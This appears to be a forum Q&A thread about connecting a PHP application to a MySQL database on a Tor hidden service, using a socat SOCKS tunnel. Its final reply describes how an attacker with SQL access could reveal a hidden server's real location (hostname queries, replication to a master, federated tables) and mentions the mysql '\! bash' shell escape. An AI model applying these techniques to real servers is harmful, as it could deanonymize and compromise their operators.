A theoretical question about connecting to hidden services through PHP.

Say I am writing an application on the clearnet that relies on data stored within a mySQL database that is hosted on a hidden Tor service. How would I initiate this connection?

Some brief research has pointed me towards the documentation on opening sockets http://php.net/manual/en/book.sockets.php, however, I haven't come across this area before so am quite unsure where to get started.

Anyone have any ideas?

Is there a specific reason for this setup? Some points to consider:

  1. MySQL does not support socks connections, you can create a socket unix file, but it's not the same thing
  2. you will have to setup Tor nodes in both ends: application server and database server
  3. you will have to setup an hidden service in order to generate private & public key in the database server
  4. share the public key in the application server and connect through a Tor client or proxy
  5. latency issues
  6. the database will still be exposed to attacks and if an attacker can access the application server or run SQL injections, then it can track back the database server location
  7. does your hosting allows such setups?

It would be a lot easier to set up a SSH tunnel or to use Tor to serve an HTTP database interface and then use curl to perform CRUD operations, but this will avoid only point one of the above list, the other points will still be valid.

Some good points. Perhaps I'm more unfamiliar with Tor protocols than I thought, but I don't understand some of things you mentioned.

2 & 3. Yes, but isn't this all an obvious given since the database server is hosted on a hidden service? The server will need a Tor node to accept incoming connections, and the client will need a node to contact the server. Likewise, setting up a hidden server will create the private & public keys, so I'm unsure why you mentioned it?

Four. My understanding was that the Tor network handled this automatically through Introduction points. https://www.torproject.org/docs/hidden-services.html.en

Six. How will the database or application server be any more vulnerable to injection attacks on Tor vs. clearnet? Also, I'm not sure someone could track a connection back to the server, because of the relays forming the connection. As we know, tracing the location of hidden services require a consistant and dedicated attack. At most, the application server would just reveal the .onion address and the location of the first relay in the network. In order to attempt to find the destination, and attacker would need to own at least one relay in the network at any given time. Unless you are meaning that a SQL injection attack could somehow compromise the SQL server into releasing its real IP? I'm unfamiliar with injections generally, so unsure if this is possible / how it would work.

Latency is obviously the biggest downside here. And I think if someone were to do this, then your idea of hosting a webservice is the most logical solution, however, I fail to see the security vulnerabilites you mentioned so some reiteration of those points would be appreciated.

2 & 3 are obvious, yes, I was repeating them just to clarify point 7: not all hostings will allow Tor nodes in their networks, so it would be difficult to perform the necessary steps to build such config.

Point 4: when you start the database connection with something like new mysqli() or new PDO() and add the onion link (e.g. mysql=host:0123456789abcdef.onion) the system will call the system glibc function getaddrinfo() to resolve the link with a DNS query and then the connect() function, at least in linux. The onion link is not resolvable with a DNS call and MySQL will not try to inject the request in the Tor node, so the connection will fail.

You could use the PHP socket extension but then you cannot use the MySQL APIs and you will have to submit the queries in raw mode and then parse the results which is like a telnet session, or like running queries from command line:

mysql -s -r -D DBNAME -e "SELECT * FROM `table_name`;"

The alternative is to force the API connection through socks but the MySQL (API) client does not support them directly, so you will need something like socat to create the local entry point, some examples, here:

This, for example, works fine for me:

socat TCP-LISTEN:3308 SOCKS4A:localhost:0123456789abcdef.onion:3306,socksport=9050

Then you can connect to the database through the local tunnel opened on port 3308:

$conn = new PDO("mysql=localhost:3308;dbname=DATABASE", "USER", "PASS");

Unless you are meaning that a SQL injection attack could somehow compromise the SQL server into releasing its real IP?

About point 6: exactly, I wasn't saying it will become more vulnerable vs clearnet, I want to make clear that I'm not trying to discourage you from testing this approach. I was just remarking that obfuscating the location does not increase itself the security of the server: if an attacker can run arbitrary queries, then he can try to run some commands to find the current location of the server, if needed:

  • by requesting the hostname;
  • by starting a connection as slave to a master database which will record the slave IP;
  • or by creating a federated table;

just to mention few queries that can be ran through the MySQL API when the user as all privileges. Then if the hypothetical attacker can start a connection through a command line client, he can use the system command to start a system shell \! bash.

In practice, keep in consideration that an attacker doesn't need to compromise the Tor network to find the hidden resource position, once he can execute commands on that endpoint, then he can follow other directions.